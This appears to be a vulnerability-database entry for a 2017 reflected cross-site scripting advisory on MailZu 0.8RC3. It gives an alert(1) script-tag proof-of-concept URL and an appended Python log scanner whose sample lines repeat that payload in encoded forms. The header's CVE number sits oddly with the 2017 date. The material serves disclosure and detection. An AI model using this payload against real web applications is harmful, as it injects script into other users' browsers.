CVE | Category | Price | Severity |
---|---|---|---|
CVE-2022-12345 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Anonymous | High | Remote | 2017-01-19 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N | 0.02192 | 0.50148 |
MailZu 0.8RC3 Cross Site Scripting

[+]###################################################################################################
[+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: [email protected]
[+] Author Company: Henceforth
[+]###################################################################################################

Vendor:
===============
https://sourceforge.net/

Product:
===============
0.8RC3

Download:
===========
https://sourceforge.net/projects/mailzu/files/mailzu/

MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine.
Users can view their own quarantine, release/delete messages or request the release of messages.

Vulnerability Type:
======================================
Reflected Cross Site Scripting.

CVE Reference:
===============
N/A

Tested on:
===============
Windows 7
Apache/2.4.23 (Win64)

Exploit/POC:
============
1) navigate the server http://server/index.php
2) inject the XSS Payload : http://server/index.php/"><script>alert(1);</script>
3) Done!

Network Access:
===============
Remote

Impact:
=================
Execute malicious scripts

Severity:
===========
High

Disclosure Timeline:
=====================
January 18, 2017 : Public Disclosure
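A defender-side check for the request shape shown in the PoC above, as an added example that is not part of the original advisory: it flags access-log entries whose path after a `.php` script name decodes to markup characters. The Apache combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of an Apache combined-format log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A .php script name followed by extra path segments (PATH_INFO)
PATH_INFO_RE = re.compile(r'^[^?]*?\.php(?P<extra>/[^?]*)', re.IGNORECASE)
MARKUP_CHARS = set('<>"\'')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_path_info(log_line):
    """Return the decoded PATH_INFO if it contains markup characters, else None."""
    request = REQUEST_RE.search(log_line)
    path = PATH_INFO_RE.match(request.group("target")) if request else None
    if not path:
        return None
    # Apache writes a literal double quote in the request line as \"
    extra = decode_fully(path.group("extra").replace('\\"', '"'))
    return extra if MARKUP_CHARS & set(extra) else None


# Constructed sample log lines (not taken from a real server)
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2017:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jan/2017:10:01:09 +0000] "GET /index.php/%22%3E%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 5203',
    '203.0.113.7 - - [19/Jan/2017:10:01:15 +0000] "GET /index.php/%2522%253E%253Cscript%253Ealert(1);%253C/script%253E HTTP/1.1" 200 5203',
    '198.51.100.4 - - [19/Jan/2017:10:02:00 +0000] "GET /index.php/messages/42?view=full HTTP/1.1" 200 4410',
]


def scan(lines):
    """Return (line_number, decoded PATH_INFO) for every flagged request."""
    flagged = ((n, suspicious_path_info(l)) for n, l in enumerate(lines, start=1))
    return [(n, hit) for n, hit in flagged if hit]


if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG):
        print(f"line {number}: markup in PATH_INFO: {payload}")
```

An apostrophe in a legitimate path segment would also be flagged, so treat hits as leads for review rather than confirmed attempts.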